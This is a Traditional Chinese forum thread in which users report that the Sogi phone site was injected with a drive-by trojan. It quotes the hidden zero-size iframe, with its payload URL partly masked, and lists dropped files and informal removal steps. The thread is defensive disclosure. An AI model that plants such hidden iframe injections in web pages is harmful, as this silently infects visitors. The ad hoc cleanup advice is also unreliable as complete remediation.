【警告】Sogi! 手機王--被植入木馬

[hcchen]

常到Sogi! 手機王的網友請注意。
該網站已經被植入木馬，一進入網站將會被暗中下載及執行木馬程式。

[schumacher]

何時發現的??
完了,我10月中旬有上去查資料耶!可是SCS3.1軟體沒有警告一一"
這下怎麼找到知道有無中標和去解這木馬??

[EVO]

這消息哪裡來的?
我這陣子都有上手機王，不過卡巴也沒偵測到，全機掃描的時候也沒發現?
所以是真的還是誤傳?

[hcchen]

這消息哪裡來的?
我這陣子都有上手機王，不過卡巴也沒偵測到，全機掃描的時候也沒發現?
所以是真的還是誤傳?

前幾天有不正常反應，今天開著FlashGet去試就攔截到了.......

開起手機王的網站後觀看原始碼，將原始碼拉到最下方：
找到以下的原始碼，就是連到木馬網站
[PHP]
<iframe src=http://www.lifeline.org.tw/image/***.***(消音) width=0 height=0></iframe>
[/PHP]
不過剛剛再去測試，上述網址已經沒有反應了.......

[hcchen]

忘記說.......^^"
開FlashGet是利用FlashGet會接手IE下載檔案的特性來捕捉那些隱藏的下載。
所以不是防毒程式攔截到的。
另外也已經通知手機王了。

[schumacher]

木馬名稱??
該木馬的目的??
那怎麼知道自己中標了??
如何解決??

謝謝QQ

[hcchen]

大概分析了一下:
[PHP]
<iframe src=http://www.lifeline.org.tw/image/***.***(消音) width=0 height=0></iframe>
[/PHP]
會經由該網頁下載檔案svchost.exe並執行。
但是會出現svchost.exe並不是標準的應用程式，然後跟著下載1.exe
svchost.exe內容：見附加檔案Sogi.jpg
檔案大小：174 位元組
該木馬的目的:未知
那怎麼知道自己中標了:
檢查C:\Documents and Settings\使用者名稱\Local Settings\Temp下是否有
svchost.exe

如何解決:
將C:\Documents and Settings\使用者名稱\Local Settings\Temp
底下的svchost.exe直接刪除


至於1.exe恕在下無膽......~"~
早早就在FlashGet裡面刪除了.......^^"

PS.偵測至目前時間還是無法ping到該網站

[schumacher]

謝謝告知!
依照大大提供的方式看來我沒中標Orz
最討厭駭客搞這種釣魚方式=.=
以後有機會再去裝一個Norton Confidential來預防XD

大概分析了一下:
~43
那怎麼知道自己中標了:
檢查C:\Documents and Settings\使用者名稱\Local Settings\Temp下是否有
svchost.exe

[hcchen]

意外的在C:\WINDOWS\system32下發現
msnfile.dll和msnfile.exe這2個檔案......
產生的時間剛好在偵測手機王木馬的這段時間
爬了一下還沒有仔細的相關資訊.......

另外，剛剛上了手機王看了一下.......
該框架語法已經移除了........

[DarkSkyline]

連到 www.sogi.com.tw 會自動下載 gfile.dll 到c:\windows\system32\資料夾底下, AntiVir PersonalEdition Premium找到"HEUR/Malware"病毒,請大家測試一下自己的防毒軟體....^_^